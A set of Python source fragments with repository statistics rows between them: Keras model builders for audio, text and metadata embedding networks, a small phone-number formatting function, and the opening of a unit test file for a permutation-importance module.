params["n_kernel_2"][1],
border_mode='valid',
activation='relu',
init="uniform")
x = conv2(x)
logging.debug("Output Conv2D: %s" % str(conv2.output_shape))
pool2 = MaxPooling2D(pool_size=(params["n_pool_2"][0],
params["n_pool_2"][1]))
x = pool2(x)
logging.debug("Output MaxPool2D: %s" % str(pool2.output_shape))
x = Dropout(params["dropout_factor"])(x)
#model.add(Permute((3,2,1)))
# Block 3 (note: 'valid' border mode is the Convolution2D default here).
conv3 = Convolution2D(params["n_filters_3"],
params["n_kernel_3"][0],
params["n_kernel_3"][1],
activation='relu',
init="uniform")
x = conv3(x)
logging.debug("Output Conv2D: %s" % str(conv3.output_shape))
pool3 = MaxPooling2D(pool_size=(params["n_pool_3"][0],
params["n_pool_3"][1]))
x = pool3(x)
logging.debug("Output MaxPool2D: %s" % str(pool3.output_shape))
x = Dropout(params["dropout_factor"])(x)
# Block 4.
conv4 = Convolution2D(params["n_filters_4"],
params["n_kernel_4"][0],
params["n_kernel_4"][1],
activation='relu',
init="uniform")
x = conv4(x)
logging.debug("Output Conv2D: %s" % str(conv4.output_shape))
pool4 = MaxPooling2D(pool_size=(params["n_pool_4"][0],
params["n_pool_4"][1]))
x = pool4(x)
logging.debug("Output MaxPool2D: %s" % str(pool4.output_shape))
x = Dropout(params["dropout_factor"])(x)
flat = Flatten(name='flat')
xflat = flat(x)
logging.debug("Output Flatten: %s" % str(flat.output_shape))
#dense1 = Dense(output_dim=params["n_dense"], init="uniform", activation='linear')
#x = dense1(x)
#logging.debug("Output CNN: %s" % str(dense1.output_shape))
# Linear projection to the output dimension, then L2-normalise so the
# network emits unit-length vectors.
dense3 = Dense(output_dim=params["n_out"], init="uniform", activation='linear')
xout = dense3(xflat)
logging.debug("Output CNN: %s" % str(dense3.output_shape))
lambda1 = Lambda(lambda x :K.l2_normalize(x, axis=1))
xout = lambda1(xout)
model = Model(input=inputs, output=xout)
return model
# AUDIO multiple filters
def get_model_12(params):
    """Build an audio CNN with a bank of parallel 2-D convolutions.

    Six fixed filter shapes are applied to the input spectrogram in parallel
    and concatenated; the merged feature map then flows through up to four
    more conv/pool/dropout stages (stages 3-5 are optional), optional dense
    layers, and a final projection of size ``params["n_out"]``.

    :param params: dict of hyper-parameters (n_frames, n_mel, n_pool_*,
        n_filters_*, n_kernel_*, dropout_factor, n_dense, n_out,
        final_activation).
    :return: a compiled-ready Keras ``Sequential`` model.
    """
    graph_in = Input(shape=(1, params["n_frames"],params["n_mel"]))
    convs = []
    # NOTE: the filter-bank geometry is hard-coded here, overwriting whatever
    # 'filter_sizes'/'filter_widths' the caller passed in `params`.
    params['filter_sizes'] = [(1,70),(5,70),(10,70),(1,35),(5,35),(10,35)]
    params['filter_widths'] = [64,32,32,64,32,32]
    # Parallel convolutions over the same input, one per filter shape.
    for i,fsz in enumerate(params['filter_sizes']):
        conv = Convolution2D(params['filter_widths'][i],fsz[0],fsz[1],
                             border_mode='same',
                             activation='relu',
                             init='uniform')
        x = conv(graph_in)
        logging.debug("Filter size: %s,%s" % (fsz[0],fsz[1]))
        logging.debug("Output CNN: %s" % str(conv.output_shape))
        convs.append(x)
    # Concatenate the parallel branches along the channel axis.
    if len(params['filter_sizes'])>1:
        merge1 = Merge(mode='concat',concat_axis=1)
        out = merge1(convs)
        logging.debug("Merge: %s" % str(merge1.output_shape))
    else:
        out = convs[0]
    graph = Model(input=graph_in, output=out)
    # Wrap the functional filter bank as the first stage of a Sequential model.
    model = Sequential()
    model.add(graph)
    model.add(MaxPooling2D(pool_size=(params["n_pool_1"][0],
                                      params["n_pool_1"][1])))
    logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
    model.add(Dropout(params["dropout_factor"]))
    #model.add(Permute((3,2,1)))
    model.add(Convolution2D(params["n_filters_2"], params["n_kernel_2"][0],
                            params["n_kernel_2"][1],
                            border_mode='valid',
                            init="uniform"))
    #model.add(BatchNormalization())
    model.add(Activation("relu"))
    #logging.debug("Input CNN: %s" % str(model.input_shape))
    logging.debug("Output Conv2D: %s" % str(model.output_shape))
    model.add(MaxPooling2D(pool_size=(params["n_pool_2"][0],
                                      params["n_pool_2"][1])))
    logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
    model.add(Dropout(params["dropout_factor"]))
    #model.add(Permute((3,2,1)))
    # Optional third conv/pool stage.
    if params["n_filters_3"] > 0:
        model.add(Convolution2D(params["n_filters_3"],
                                params["n_kernel_3"][0],
                                params["n_kernel_3"][1],
                                border_mode='valid',
                                init="uniform"))
        #model.add(BatchNormalization())
        model.add(Activation("relu"))
        logging.debug("Output Conv2D: %s" % str(model.output_shape))
        model.add(MaxPooling2D(pool_size=(params["n_pool_3"][0],
                                          params["n_pool_3"][1])))
        logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
        model.add(Dropout(params["dropout_factor"]))
    # Optional fourth conv/pool stage.
    if params["n_filters_4"] > 0:
        model.add(Convolution2D(params["n_filters_4"],
                                params["n_kernel_4"][0],
                                params["n_kernel_4"][1],
                                border_mode='valid',
                                init="uniform"))
        model.add(Activation("relu"))
        #model.add(BatchNormalization())
        logging.debug("Output Conv2D: %s" % str(model.output_shape))
        model.add(MaxPooling2D(pool_size=(params["n_pool_4"][0],
                                          params["n_pool_4"][1])))
        logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
        model.add(Dropout(params["dropout_factor"]))
    # Optional fifth conv/pool stage.
    if params["n_filters_5"] > 0:
        model.add(Convolution2D(params["n_filters_5"],
                                params["n_kernel_5"][0],
                                params["n_kernel_5"][1],
                                border_mode='valid',
                                init="uniform"))
        model.add(Activation("relu"))
        #model.add(BatchNormalization())
        logging.debug("Output Conv2D: %s" % str(model.output_shape))
        model.add(MaxPooling2D(pool_size=(params["n_pool_5"][0],
                                          params["n_pool_5"][1])))
        logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
        model.add(Dropout(params["dropout_factor"]))
    model.add(Flatten())
    logging.debug("Output Flatten: %s" % str(model.output_shape))
    #model.add(Dropout(params["dropout_factor"]))
    # Optional pair of fully-connected layers before the output projection.
    if params["n_dense"] > 0:
        model.add(Dense(output_dim=params["n_dense"], init="uniform"))
        model.add(Activation("relu"))
        model.add(Dropout(params["dropout_factor"]))
        logging.debug("Output Dense: %s" % str(model.output_shape))
        model.add(Dense(output_dim=params["n_dense"], init="uniform"))
        model.add(Activation("relu"))
        model.add(Dropout(params["dropout_factor"]))
        logging.debug("Output Dense: %s" % str(model.output_shape))
    model.add(Dense(output_dim=params["n_out"], init="uniform"))
    model.add(Activation(params["final_activation"]))
    logging.debug("Output CNN: %s" % str(model.output_shape))
    # L2-normalize embeddings when the model is trained with cosine loss.
    if params['final_activation'] == 'linear':
        model.add(Lambda(lambda x :K.l2_normalize(x, axis=1)))
    return model
# Multimodal ARCH text + audio
def get_model_2(params):
    """Build a two-branch multimodal model.

    Branch 1: a four-stage conv/pool/dropout CNN over the input spectrogram.
    Branch 2: a single ReLU dense layer over a flat metadata vector.
    The branches are concatenated, projected to ``params["n_out"]`` with a
    linear dense layer, and L2-normalized (embedding output).

    :param params: dict of hyper-parameters (n_frames, n_mel, n_filters_*,
        n_kernel_*, n_pool_*, dropout_factor, n_metafeatures, n_dense, n_out).
    :return: a Keras ``Model`` with inputs ``[audio, metadata]``.
    """
    inputs = Input(shape=(1, params["n_frames"],
                          params["n_mel"]))
    conv1 = Convolution2D(params["n_filters_1"], params["n_kernel_1"][0],
                          params["n_kernel_1"][1],
                          border_mode='valid',
                          activation='relu',
                          input_shape=(1, params["n_frames"],
                                       params["n_mel"]),
                          init="uniform")
    x = conv1(inputs)
    #logging.debug("Input CNN: %s" % str(inputs.output_shape))
    logging.debug("Output Conv2D: %s" % str(conv1.output_shape))
    pool1 = MaxPooling2D(pool_size=(params["n_pool_1"][0],
                                    params["n_pool_1"][1]))
    x = pool1(x)
    logging.debug("Output MaxPool2D: %s" % str(pool1.output_shape))
    x = Dropout(params["dropout_factor"])(x)
    conv2 = Convolution2D(params["n_filters_2"], params["n_kernel_2"][0],
                          params["n_kernel_2"][1],
                          border_mode='valid',
                          activation='relu',
                          init="uniform")
    x = conv2(x)
    logging.debug("Output Conv2D: %s" % str(conv2.output_shape))
    pool2 = MaxPooling2D(pool_size=(params["n_pool_2"][0],
                                    params["n_pool_2"][1]))
    x = pool2(x)
    logging.debug("Output MaxPool2D: %s" % str(pool2.output_shape))
    x = Dropout(params["dropout_factor"])(x)
    #model.add(Permute((3,2,1)))
    # Stages 3 and 4 use the default border mode (no 'valid' given here).
    conv3 = Convolution2D(params["n_filters_3"],
                          params["n_kernel_3"][0],
                          params["n_kernel_3"][1],
                          activation='relu',
                          init="uniform")
    x = conv3(x)
    logging.debug("Output Conv2D: %s" % str(conv3.output_shape))
    pool3 = MaxPooling2D(pool_size=(params["n_pool_3"][0],
                                    params["n_pool_3"][1]))
    x = pool3(x)
    logging.debug("Output MaxPool2D: %s" % str(pool3.output_shape))
    x = Dropout(params["dropout_factor"])(x)
    conv4 = Convolution2D(params["n_filters_4"],
                          params["n_kernel_4"][0],
                          params["n_kernel_4"][1],
                          activation='relu',
                          init="uniform")
    x = conv4(x)
    logging.debug("Output Conv2D: %s" % str(conv4.output_shape))
    pool4 = MaxPooling2D(pool_size=(params["n_pool_4"][0],
                                    params["n_pool_4"][1]))
    x = pool4(x)
    logging.debug("Output MaxPool2D: %s" % str(pool4.output_shape))
    x = Dropout(params["dropout_factor"])(x)
    flat = Flatten()
    x = flat(x)
    logging.debug("Output Flatten: %s" % str(flat.output_shape))
    #dense1 = Dense(output_dim=params["n_dense"], init="uniform", activation='linear')
    #x = dense1(x)
    #logging.debug("Output CNN: %s" % str(dense1.output_shape))
    # metadata
    inputs2 = Input(shape=(params["n_metafeatures"],))
    dense2 = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
    x2 = dense2(inputs2)
    logging.debug("Output CNN: %s" % str(dense2.output_shape))
    x2 = Dropout(params["dropout_factor"])(x2)
    # merge
    xout = merge([x, x2], mode='concat', concat_axis=1)
    dense3 = Dense(output_dim=params["n_out"], init="uniform", activation='linear')
    xout = dense3(xout)
    logging.debug("Output CNN: %s" % str(dense3.output_shape))
    # L2-normalize so the output can be compared with cosine similarity.
    lambda1 = Lambda(lambda x :K.l2_normalize(x, axis=1))
    xout = lambda1(xout)
    model = Model(input=[inputs,inputs2], output=xout)
    return model
# METADATA ARCH
def get_model_3(params):
    """Feed-forward network over a flat metadata feature vector.

    Structure: dropout on the input, up to two optional ReLU hidden layers
    (enabled when ``n_dense`` / ``n_dense_2`` are positive, each followed by
    dropout), a final projection with ``params['final_activation']``, and an
    L2-normalization step when that activation is 'linear'.
    """
    meta_input = Input(shape=(params["n_metafeatures"],))
    hidden = Dropout(params["dropout_factor"])(meta_input)
    # First optional hidden layer.
    if params["n_dense"] > 0:
        first_dense = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
        hidden = first_dense(hidden)
        logging.debug("Output CNN: %s" % str(first_dense.output_shape))
        hidden = Dropout(params["dropout_factor"])(hidden)
    # Second optional hidden layer.
    if params["n_dense_2"] > 0:
        second_dense = Dense(output_dim=params["n_dense_2"], init="uniform", activation='relu')
        hidden = second_dense(hidden)
        logging.debug("Output CNN: %s" % str(second_dense.output_shape))
        hidden = Dropout(params["dropout_factor"])(hidden)
    output_dense = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
    prediction = output_dense(hidden)
    logging.debug("Output CNN: %s" % str(output_dense.output_shape))
    # Normalize embeddings when training with a cosine-style loss.
    if params['final_activation'] == 'linear':
        prediction = Lambda(lambda t: K.l2_normalize(t, axis=1))(prediction)
    return Model(input=meta_input, output=prediction)
# Metadata 2 inputs, post-merge with dense layers
def get_model_31(params):
    """Two metadata branches merged after their dense layers.

    Each branch runs batch-norm -> dropout -> ReLU dense -> dropout; the two
    branches are concatenated and projected to ``params['n_out']`` with
    ``params['final_activation']``, then L2-normalized when linear.
    """
    def _branch(n_features):
        # One metadata branch: BN -> dropout -> dense(relu) -> dropout.
        branch_input = Input(shape=(n_features,))
        h = BatchNormalization()(branch_input)
        h = Dropout(params["dropout_factor"])(h)
        dense_layer = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
        h = dense_layer(h)
        logging.debug("Output CNN: %s" % str(dense_layer.output_shape))
        h = Dropout(params["dropout_factor"])(h)
        return branch_input, h

    input_a, branch_a = _branch(params["n_metafeatures"])
    input_b, branch_b = _branch(params["n_metafeatures2"])
    # merge
    merged = merge([branch_a, branch_b], mode='concat', concat_axis=1)
    out_dense = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
    prediction = out_dense(merged)
    logging.debug("Output CNN: %s" % str(out_dense.output_shape))
    if params['final_activation'] == 'linear':
        prediction = Lambda(lambda t: K.l2_normalize(t, axis=1))(prediction)
    return Model(input=[input_a, input_b], output=prediction)
# Metadata 2 inputs, pre-merge and l2
def get_model_32(params):
    """Two metadata branches, each L2-normalized, merged before any dense layer.

    After concatenation: dropout, an optional ReLU hidden layer (when
    ``n_dense`` > 0), a projection to ``params['n_out']``, and a final
    L2-normalization when the output activation is 'linear'.
    """
    branch_inputs = []
    normalized = []
    for size_key in ("n_metafeatures", "n_metafeatures2"):
        branch_input = Input(shape=(params[size_key],))
        branch_inputs.append(branch_input)
        normalized.append(Lambda(lambda t: K.l2_normalize(t, axis=1))(branch_input))
    # merge
    x = merge(normalized, mode='concat', concat_axis=1)
    x = Dropout(params["dropout_factor"])(x)
    if params['n_dense'] > 0:
        hidden_dense = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
        x = hidden_dense(x)
        logging.debug("Output CNN: %s" % str(hidden_dense.output_shape))
    out_dense = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
    prediction = out_dense(x)
    logging.debug("Output CNN: %s" % str(out_dense.output_shape))
    if params['final_activation'] == 'linear':
        prediction = Lambda(lambda t: K.l2_normalize(t, axis=1))(prediction)
    return Model(input=branch_inputs, output=prediction)
# Metadata 3 inputs, pre-merge and l2
def get_model_33(params):
    """Three metadata branches, each L2-normalized, merged before dense layers.

    Identical head to get_model_32: dropout, optional ReLU hidden layer,
    projection to ``params['n_out']``, L2-normalization when linear.
    """
    branch_inputs = []
    normalized = []
    for size_key in ("n_metafeatures", "n_metafeatures2", "n_metafeatures3"):
        branch_input = Input(shape=(params[size_key],))
        branch_inputs.append(branch_input)
        normalized.append(Lambda(lambda t: K.l2_normalize(t, axis=1))(branch_input))
    # merge
    x = merge(normalized, mode='concat', concat_axis=1)
    x = Dropout(params["dropout_factor"])(x)
    if params['n_dense'] > 0:
        hidden_dense = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
        x = hidden_dense(x)
        logging.debug("Output CNN: %s" % str(hidden_dense.output_shape))
    out_dense = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
    prediction = out_dense(x)
    logging.debug("Output CNN: %s" % str(out_dense.output_shape))
    if params['final_activation'] == 'linear':
        prediction = Lambda(lambda t: K.l2_normalize(t, axis=1))(prediction)
    return Model(input=branch_inputs, output=prediction)
# Metadata 4 inputs, pre-merge and l2
def get_model_34(params):
    """Four metadata branches, each L2-normalized, merged before dense layers.

    Identical head to get_model_32/33: dropout, optional ReLU hidden layer,
    projection to ``params['n_out']``, L2-normalization when linear.
    """
    branch_inputs = []
    normalized = []
    for size_key in ("n_metafeatures", "n_metafeatures2",
                     "n_metafeatures3", "n_metafeatures4"):
        branch_input = Input(shape=(params[size_key],))
        branch_inputs.append(branch_input)
        normalized.append(Lambda(lambda t: K.l2_normalize(t, axis=1))(branch_input))
    # merge
    x = merge(normalized, mode='concat', concat_axis=1)
    x = Dropout(params["dropout_factor"])(x)
    if params['n_dense'] > 0:
        hidden_dense = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
        x = hidden_dense(x)
        logging.debug("Output CNN: %s" % str(hidden_dense.output_shape))
    out_dense = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
    prediction = out_dense(x)
    logging.debug("Output CNN: %s" % str(out_dense.output_shape))
    if params['final_activation'] == 'linear':
        prediction = Lambda(lambda t: K.l2_normalize(t, axis=1))(prediction)
    return Model(input=branch_inputs, output=prediction)
# Default hyper-parameter configuration for the word2vec experiments:
# dataset selection, SGD training settings, CNN architecture sizes, and
# prediction/evaluation switches.
params_w2v = {
    # dataset params
    'dataset' : {
        'fact' : 'als',
        'dim' : 200,
        'dataset' : 'W2',
        'window' : 15,
        'nsamples' : 'all',
        'npatches' : 1,
        'meta-suffix' : ''
    },
    # training params
    'training' : {
        'decay' : 1e-6,
        'learning_rate' : 0.1,
        'momentum' : 0.95,
        'n_epochs' : 100,
        'n_minibatch' : 32,
        'nesterov' : True,
        'validation' : 0.1,
        'test' : 0.1,
        'loss_func' : 'cosine',
        'optimizer' : 'sgd'
    },
    # cnn params
    'cnn' : {
        'dropout_factor' : 0.5,
        'sequence_length' : 500,
        'embedding_dim' : 300,
        'filter_sizes' : (2, 3),
        'num_filters' : 150,
        'dropout_prob' : (0.5, 0.8),
        'hidden_dims' : 2048,
        'batch_size' : 32,
        'num_epochs' : 100,
        'val_split' : 0.1,
        'model_variation' : 'CNN-rnd',
        'n_out' : 200,
        'n_frames' : '',
        'n_mel' : 96,
        # selects which get_model_* builder is used
        'architecture' : 82,
        'n_metafeatures' : 7927,#5393
        'final_activation' : 'linear'
    },
    'predicting' : {
        'trim_coeff' : 0.15
    },
    'evaluating' : {
        'get_map' : False,
        'get_p' : True,
        'get_knn' : False
    }
}
# word2vec ARCH with CNNs
def get_model_4(params):
    """Text CNN over word2vec embeddings (parallel 1-D filter widths).

    A functional sub-graph applies one Convolution1D + global max-pool per
    filter size and concatenates the results; the Sequential wrapper adds the
    (optional) embedding layer, dropout, a dense head, and the output
    projection, L2-normalized when the final activation is 'linear'.

    Fixes over the original: the pickle file handle is closed via a context
    manager (it was previously leaked), and the local Merge layer no longer
    shadows the functional-API ``merge`` helper used by sibling builders.

    :param params: dict with 'embeddings_suffix', 'sequence_length',
        'embedding_dim', 'filter_sizes', 'num_filters', 'model_variation',
        'dropout_prob', 'n_dense', 'n_out', 'final_activation'.
    :return: a Keras ``Sequential`` model.
    """
    # Context manager ensures the pickle file handle is closed.
    with open(common.TRAINDATA_DIR +
              "/embedding_weights_w2v_%s.pk" % params['embeddings_suffix'],
              "rb") as weights_file:
        embedding_weights = pickle.load(weights_file)
    graph_in = Input(shape=(params['sequence_length'], params['embedding_dim']))
    convs = []
    for fsz in params['filter_sizes']:
        conv = Convolution1D(nb_filter=params['num_filters'],
                             filter_length=fsz,
                             border_mode='valid',
                             activation='relu',
                             subsample_length=1)
        x = conv(graph_in)
        logging.debug("Filter size: %s" % fsz)
        logging.debug("Output CNN: %s" % str(conv.output_shape))
        pool = GlobalMaxPooling1D()
        x = pool(x)
        logging.debug("Output Pooling: %s" % str(pool.output_shape))
        convs.append(x)
    if len(params['filter_sizes'])>1:
        # Renamed from `merge` to avoid shadowing the functional-API helper.
        merge_layer = Merge(mode='concat')
        out = merge_layer(convs)
        logging.debug("Merge: %s" % str(merge_layer.output_shape))
    else:
        out = convs[0]
    graph = Model(input=graph_in, output=out)
    # main sequential model
    model = Sequential()
    # 'CNN-static' feeds pre-computed embeddings directly (no Embedding layer).
    if not params['model_variation']=='CNN-static':
        model.add(Embedding(len(embedding_weights[0]), params['embedding_dim'], input_length=params['sequence_length'],
                            weights=embedding_weights))
    model.add(Dropout(params['dropout_prob'][0], input_shape=(params['sequence_length'], params['embedding_dim'])))
    model.add(graph)
    model.add(Dense(params['n_dense']))
    model.add(Dropout(params['dropout_prob'][1]))
    model.add(Activation('relu'))
    model.add(Dense(output_dim=params["n_out"], init="uniform"))
    model.add(Activation(params['final_activation']))
    logging.debug("Output CNN: %s" % str(model.output_shape))
    if params['final_activation'] == 'linear':
        model.add(Lambda(lambda x :K.l2_normalize(x, axis=1)))
    return model
# word2vec ARCH with LSTM
def get_model_41(params):
    """Text model: word2vec embedding layer followed by a 2048-unit LSTM.

    Loads pre-trained embedding weights from a hard-coded pickle path, feeds
    them into an Embedding layer, runs an LSTM, projects to
    ``params['n_out']``, and L2-normalizes when the final activation is
    'linear'.

    Fix over the original: the pickle file handle is closed via a context
    manager (it was previously leaked).

    :param params: dict with 'embedding_dim', 'sequence_length', 'n_out',
        'final_activation'.
    :return: a Keras ``Sequential`` model.
    """
    # Context manager ensures the pickle file handle is closed.
    with open("../data/datasets/train_data/embedding_weights_w2v-google_MSD-AG.pk",
              "rb") as weights_file:
        embedding_weights = pickle.load(weights_file)
    # main sequential model
    model = Sequential()
    model.add(Embedding(len(embedding_weights[0]), params['embedding_dim'], input_length=params['sequence_length'],
                        weights=embedding_weights))
    #model.add(Dropout(params['dropout_prob'][0], input_shape=(params['sequence_length'], params['embedding_dim'])))
    model.add(LSTM(2048))
    #model.add(Dropout(params['dropout_prob'][1]))
    model.add(Dense(output_dim=params["n_out"], init="uniform"))
    model.add(Activation(params['final_activation']))
    logging.debug("Output CNN: %s" % str(model.output_shape))
    if params['final_activation'] == 'linear':
        model.add(Lambda(lambda x :K.l2_normalize(x, axis=1)))
    return model
# CRNN Arch for audio
def get_model_5(params):
    """Convolutional-recurrent network over a (96 x 1366) mel-spectrogram.

    Four conv/BN/ELU/pool/dropout blocks feed two stacked GRUs; the final
    dense layer uses ``params['final_activation']`` and is L2-normalized when
    that activation is 'linear'.  Input shape and axis indices adapt to the
    backend image ordering ('th' vs 'tf').

    :param params: dict with 'n_out' and 'final_activation'.
    :return: a Keras functional ``Model``.
    """
    # These were presumably once function arguments; they are fixed here, so
    # the input_tensor branch below is effectively dead code.
    input_tensor=None
    include_top=True
    # Determine proper input shape
    if K.image_dim_ordering() == 'th':
        input_shape = (1, 96, 1366)
    else:
        input_shape = (96, 1366, 1)
    if input_tensor is None:
        melgram_input = Input(shape=input_shape)
    else:
        if not K.is_keras_tensor(input_tensor):
            melgram_input = Input(tensor=input_tensor, shape=input_shape)
        else:
            melgram_input = input_tensor
    # Determine input axis
    if K.image_dim_ordering() == 'th':
        channel_axis = 1
        freq_axis = 2
        time_axis = 3
    else:
        channel_axis = 3
        freq_axis = 1
        time_axis = 2
    # Input block: pad time axis, normalize per frequency band, reorder axes.
    x = ZeroPadding2D(padding=(0, 37))(melgram_input)
    x = BatchNormalization(axis=freq_axis, name='bn_0_freq')(x)
    x = Permute((1, 3, 2))(x)
    # Conv block 1
    x = Convolution2D(64, 3, 3, border_mode='same', name='conv1')(x)
    x = BatchNormalization(axis=channel_axis, mode=0, name='bn1')(x)
    x = ELU()(x)
    x = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool1')(x)
    x = Dropout(0.1, name='dropout1')(x)
    # Conv block 2
    x = Convolution2D(128, 3, 3, border_mode='same', name='conv2')(x)
    x = BatchNormalization(axis=channel_axis, mode=0, name='bn2')(x)
    x = ELU()(x)
    x = MaxPooling2D(pool_size=(3, 3), strides=(3, 3), name='pool2')(x)
    x = Dropout(0.1, name='dropout2')(x)
    # Conv block 3
    x = Convolution2D(128, 3, 3, border_mode='same', name='conv3')(x)
    x = BatchNormalization(axis=channel_axis, mode=0, name='bn3')(x)
    x = ELU()(x)
    x = MaxPooling2D(pool_size=(4, 4), strides=(4, 4), name='pool3')(x)
    x = Dropout(0.1, name='dropout3')(x)
    # Conv block 4
    x = Convolution2D(128, 3, 3, border_mode='same', name='conv4')(x)
    x = BatchNormalization(axis=channel_axis, mode=0, name='bn4')(x)
    x = ELU()(x)
    x = MaxPooling2D(pool_size=(4, 4), strides=(4, 4), name='pool4')(x)
    x = Dropout(0.1, name='dropout4')(x)
    # reshaping: collapse to a (time, features) sequence for the GRUs.
    if K.image_dim_ordering() == 'th':
        x = Permute((3, 2, 1))(x)
    x = Reshape((15, 128))(x)
    # GRU block 1, 2, output
    x = GRU(32, return_sequences=True, name='gru1')(x)
    x = GRU(32, return_sequences=False, name='gru2')(x)
    x = Dropout(0.3)(x)
    if include_top:
        x = Dense(params["n_out"], activation=params['final_activation'], name='output')(x)
    if params['final_activation'] == 'linear':
        reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
        x = reg(x)
    # Create model
    model = Model(melgram_input, x)
    return model
# AUDIO Features
def get_model_6(params):
    """Dense network over audio feature vectors with a three-activation split.

    The input is fed in parallel through three dense layers (relu, tanh,
    sigmoid) whose outputs are concatenated, then through dropout, an optional
    second hidden layer, and the output projection; L2-normalized when the
    final activation is 'linear'.

    :param params: dict with 'n_metafeatures', 'n_dense', 'n_dense_2',
        'dropout_factor', 'n_out', 'final_activation'.
    :return: a Keras functional ``Model``.
    """
    # metadata
    inputs2 = Input(shape=(params["n_metafeatures"],))
    #x2 = Dropout(params["dropout_factor"])(inputs2)
    # NOTE(review): if params["n_dense"] == 0, `x` is never assigned and the
    # Dropout call below raises NameError — this architecture effectively
    # requires n_dense > 0; confirm against the configs that select it.
    if params["n_dense"] > 0:
        dense21 = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
        x21 = dense21(inputs2)
        logging.debug("Output CNN: %s" % str(dense21.output_shape))
        dense22 = Dense(output_dim=params["n_dense"], init="uniform", activation='tanh')
        x22 = dense22(inputs2)
        logging.debug("Output CNN: %s" % str(dense22.output_shape))
        dense23 = Dense(output_dim=params["n_dense"], init="uniform", activation='sigmoid')
        x23 = dense23(inputs2)
        logging.debug("Output CNN: %s" % str(dense23.output_shape))
        # merge
        x = merge([x21, x22, x23], mode='concat', concat_axis=1)
    x2 = Dropout(params["dropout_factor"])(x)
    if params["n_dense_2"] > 0:
        dense3 = Dense(output_dim=params["n_dense_2"], init="uniform", activation='relu')
        x2 = dense3(x2)
        logging.debug("Output CNN: %s" % str(dense3.output_shape))
        x2 = Dropout(params["dropout_factor"])(x2)
    dense4 = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
    xout = dense4(x2)
    logging.debug("Output CNN: %s" % str(dense4.output_shape))
    if params['final_activation'] == 'linear':
        reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
        xout = reg(xout)
    model = Model(input=inputs2, output=xout)
    return model
def main():
    """Command-line entry point (no-op: this module is meant to be imported)."""
    pass

if __name__ == '__main__':
    main()
| 34.984127
| 169
| 0.570357
| 4,059
| 33,060
| 4.474501
| 0.0712
| 0.061667
| 0.071358
| 0.054399
| 0.826286
| 0.808116
| 0.784991
| 0.772052
| 0.755754
| 0.717983
| 0
| 0.038885
| 0.2719
| 33,060
| 944
| 170
| 35.021186
| 0.715633
| 0.057108
| 0
| 0.700148
| 0
| 0
| 0.177562
| 0.003023
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020679
| false
| 0.001477
| 0.017725
| 0
| 0.057607
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f01dfee176cb2cddb90d8279a1acf9e8edc63e6
| 206
|
py
|
Python
|
6kyu/Create Phone Number.py
|
walkgo/codewars_tasks
|
4c0ab6f0e1d2181318fc15b12dd55ef565ecd223
|
[
"MIT"
] | null | null | null |
6kyu/Create Phone Number.py
|
walkgo/codewars_tasks
|
4c0ab6f0e1d2181318fc15b12dd55ef565ecd223
|
[
"MIT"
] | null | null | null |
6kyu/Create Phone Number.py
|
walkgo/codewars_tasks
|
4c0ab6f0e1d2181318fc15b12dd55ef565ecd223
|
[
"MIT"
] | null | null | null |
def create_phone_number(n):
    """Format a sequence of 10 digits as a US phone number string.

    :param n: sequence of ten integers 0-9.
    :return: string of the form ``"(XXX) XXX-XXXX"``.

    The file previously defined this function twice; the second ("Best
    Practices") definition shadowed the first and *printed* the result
    instead of returning it, so callers received ``None``.  Collapsed into
    a single implementation that unpacks the digits into the format string
    and returns the result.
    """
    return "({}{}{}) {}{}{}-{}{}{}{}".format(*n)
| 25.75
| 80
| 0.475728
| 37
| 206
| 2.540541
| 0.567568
| 0.191489
| 0.297872
| 0.425532
| 0.446809
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054645
| 0.11165
| 206
| 7
| 81
| 29.428571
| 0.459016
| 0.067961
| 0
| 0.5
| 0
| 0.25
| 0.463158
| 0.226316
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.25
| 0.75
| 0.25
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
8f694fbdc89b42f77436a3c37d0824105896218b
| 27,334
|
py
|
Python
|
ml4tc/machine_learning/permutation_test.py
|
NOAA-GSL/ml4tc
|
e9f8faa51e5bfb86b2a78648d7b1d0e61d09b6c0
|
[
"MIT"
] | null | null | null |
ml4tc/machine_learning/permutation_test.py
|
NOAA-GSL/ml4tc
|
e9f8faa51e5bfb86b2a78648d7b1d0e61d09b6c0
|
[
"MIT"
] | null | null | null |
ml4tc/machine_learning/permutation_test.py
|
NOAA-GSL/ml4tc
|
e9f8faa51e5bfb86b2a78648d7b1d0e61d09b6c0
|
[
"MIT"
] | null | null | null |
"""Unit tests for permutation.py."""
import unittest
import numpy
from ml4tc.utils import satellite_utils
from ml4tc.machine_learning import neural_net
from ml4tc.machine_learning import permutation
# Absolute tolerance for float comparisons via numpy.allclose.
TOLERANCE = 1e-6
# Re-exported constants from the module under test.
